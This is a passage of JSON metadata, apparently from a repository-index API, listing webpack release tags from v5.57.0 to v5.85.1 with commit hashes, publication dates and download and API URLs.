.0/manifests"},{"name":"v5.85.1","sha":"f0f0dd548871566c77c69cdf3d00eaf0faf9a5cd","kind":"tag","published_at":"2023-06-05T14:30:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1/manifests"},{"name":"v5.85.0","sha":"c80b069dca8eedebfa8ede9ce740891362fdb8bf","kind":"tag","published_at":"2023-05-31T19:20:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0/manifests"},{"name":"v5.84.1","sha":"71d9a21c32974b5166f9ce2f5549849d0c7ad310","kind":"tag","published_at":"2023-05-25T18:35:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1/manifests"},{"name":"v5.84.0","sha":"4d4caf13add84f996790e5bbdf79b66a548f8273","kind":"tag","published_at":"2023-05-24T17:00:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0/manifests"},{"name":"v5.83.1","sha":"81c8fbde2e0e4b8d2e30a5109dedc082ef8c09dc","kind":"tag","published_at":"2023-05-17T20:22:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1/manifests"},{"name":"v5.83.0","sha":"ccb3b860520c9472eff3d411a48105f882cf482a","kind":"tag","published_at":"2023-05-17T15:29:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0/manifests"},{"name":"v5.82.1","sha":"a8fd8b7598e8a599871765e0167cacf8318944a9","kind":"tag","published_at":"2023-05-10T15:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1/manifests"},{"name":"v5.82.0","sha":"1018ca80b31ea72436510398cca5be335b6ac81c","kind":"tag","published_at":"2023-05-03T17:03:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0/manifests"},{"name":"v5.81.0","sha":"5c016a8ec1bbfd73a7fc20d4b474938e61ee3a57","kind":"tag","published_at":"2023-04-26T14:41:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.81.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0/manifests"},{"name":"v5.80.0","sha":"9ac1728ee359efbbd1eb317f4a12c0f8136a690e","kind":"tag","published_at":"2023-04-19T16:56:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.80.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0/manifests"},{"name":"v5.79.0","sha":"ecdcc1a1d02a3097acb9ebc0896365ae1f4d25e2","kind":"tag","published_at":"2023-04-12T15:12:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.79.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0/manifests"},{"name":"v5.78.0","sha":"e51f8347026588c90f9bd91681597e97f24f40c9","kind":"tag","published_at":"2023-04-05T18:09:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.78.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0/manifests"},{"name":"v5.77.0","sha":"263f29189060529198b7ab4dbddfd2dca46bd96e","kind":"tag","published_at":"2023-03-29T14:19:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.77.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0/manifests"},{"name":"v5.76.3","sha":"8ac9616280aebfb61ae7484f06ad1979d73e6a56","kind":"tag","published_at":"2023-03-22T14:59:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3/manifests"},{"name":"v5.76.2","sha":"dbf7bf39ab96e1462603435c150d601bb69ebe4e","kind":"tag","published_at":"2023-03-15T15:00:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2/manifests"},{"name":"v5.76.1","sha":"21be52b681c477f8ebc41c1b0e7a7a8ac4fa7008","kind":"commit","published_at":"2023-03-10T22:59:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1/manifests"},{"name":"v5.76.0","sha":"97b1718720c33f1b17302a74c5284b01e02ec001","kind":"commit","published_at":"2023-03-08T17:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0/manifests"},{"name":"v5.75.0","sha":"8241da7f1e75c5581ba535d127fa66aeb9eb2ac8","kind":"tag","published_at":"2022-11-09T15:27:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.75.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0/manifests"},{"name":"v5.74.0","sha":"8f87b50dc7ac24eb5c91fd0d55a22e34e252863c","kind":"tag","published_at":"2022-07-25T08:00:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.74.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0/manifests"},{"name":"v5.73.0","sha":"36051a5ca77b4fa33fac651e1af650c7b910a873","kind":"tag","published_at":"2022-06-02T11:24:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.73.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0/manifests"},{"name":"v5.72.1","sha":"08ecfbbc035b12f2ed5c0b83b53011dfe57ae7c9","kind":"tag","published_at":"2022-05-10T10:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1/manifests"},{"name":"v5.72.0","sha":"d3a0f8de03f26a83b4d5db3cfe177617a3801df3","kind":"tag","published_at":"2022-04-07T12:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0/manifests"},{"name":"v5.71.0","sha":"c2079f7e7666a913d6fdad4b9102ffb0d3801cc8","kind":"tag","published_at":"2022-04-01T13:41:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.71.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0/manifests"},{"name":"v5.70.0","sha":"5a26b7c4a923c42022ca97fe9cbf46907a20d6d8","kind":"tag","published_at":"2022-03-03T14:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.70.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0/manifests"},{"name":"v5.69.1","sha":"dfdc8b133d3d49371251e29efeefb9d31b982c9e","kind":"tag","published_at":"2022-02-17T13:46:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1/manifests"},{"name":"v5.69.0","sha":"9d21401151b32abcefad0ffdb3238da91e2089ef","kind":"tag","published_at":"2022-02-15T12:33:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0/manifests"},{"name":"v5.68.0","sha":"f593d98453e7920bf65f24bf051cd67b5704b59d","kind":"tag","published_at":"2022-01-31T16:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.68.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0/manifests"},{"name":"v5.67.0","sha":"4abe329dcdaea60371c03c0d85c3a3994d875138","kind":"tag","published_at":"2022-01-21T17:44:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.67.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0/manifests"},{"name":"v5.66.0","sha":"0105bc1f005d78e3819a567ffb91432683569070","kind":"tag","published_at":"2022-01-12T08:23:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.66.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0/manifests"},{"name":"v5.65.0","sha":"323d65e2b1f6d275bf1b4a93ef753f027de78193","kind":"tag","published_at":"2021-12-06T13:57:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.65.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0/manifests"},{"name":"v5.64.4","sha":"d3cd4cb6e38338237fe722d4b7feae2244c425c5","kind":"tag","published_at":"2021-11-25T15:49:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4/manifests"},{"name":"v5.64.3","sha":"c66e4ce32027fd31935ce9197c219e46308ebd3f","kind":"tag","published_at":"2021-11-24T08:27:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3/manifests"},{"name":"v5.64.2","sha":"0065223c4ddac3bf872bc8d660ef1e9a63afa080","kind":"tag","published_at":"2021-11-20T13:43:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2/manifests"},{"name":"v5.64.1","sha":"3d5503a5b535b89bbdde78535c1839cefd88e4fa","kind":"tag","published_at":"2021-11-15T17:16:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1/manifests"},{"name":"v5.64.0","sha":"789e58514b5747f6474bc247e4e104ce22892a2c","kind":"tag","published_at":"2021-11-11T14:16:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0/manifests"},{"name":"v5.63.0","sha":"f011c70aacbd4dd3c4e518b9b9d8ea945dce0a9a","kind":"tag","published_at":"2021-11-09T19:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.63.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0/manifests"},{"name":"v5.62.2","sha":"3aed1fe0249f8730a35fab62e3cdc3b399b0b6e9","kind":"tag","published_at":"2021-11-09T11:12:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2/manifests"},{"name":"v5.62.1","sha":"daba59b3d60e7895543b6563682c209e4ad6b8b8","kind":"tag","published_at":"2021-11-05T16:26:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1/manifests"},{"name":"v5.62.0","sha":"04640dcc757c8b3e78c6cbf6e4dda7cbbde33fe2","kind":"tag","published_at":"2021-11-05T14:56:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0/manifests"},{"name":"v5.61.0","sha":"0306510f7d1b9b13900f1dcf78a767c2ed390a61","kind":"tag","published_at":"2021-10-29T14:00:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.61.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0/manifests"},{"name":"v5.60.0","sha":"f0298fe46fc22eebf42eb034a9435d7c19aeddd9","kind":"tag","published_at":"2021-10-25T16:20:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.60.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0/manifests"},{"name":"v5.59.1","sha":"3dbbdcb28cce3860247f06a18e48f536ab266834","kind":"tag","published_at":"2021-10-20T21:39:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1/manifests"},{"name":"v5.59.0","sha":"19ca23f062544263f48d2947da0ecfb29ae0bb36","kind":"tag","published_at":"2021-10-19T17:54:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0/manifests"},{"name":"v5.58.2","sha":"8a6d156c156282dd3d0ba001187c282402a1177f","kind":"tag","published_at":"2021-10-13T09:39:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2/manifests"},{"name":"v5.58.1","sha":"2eecffb2739d13d3095568d118ffc0baacec5cd8","kind":"tag","published_at":"2021-10-08T13:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1/manifests"},{"name":"v5.58.0","sha":"7666277551be32947227e80fb2fccdbbe656254b","kind":"tag","published_at":"2021-10-07T15:48:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0/manifests"},{"name":"v5.57.1","sha":"0581bb3c1c32bcb3e182a0f732b862a6c5bb7846","kind":"tag","published_at":"2021-10-05T18:25:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1/manifests"},{"name":"v5.57.0","sha":"e841ab01417f8e1dd6a2533638f848b5ad0c7d16","kind":"tag","published_at":"2021-10-05T15:06:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/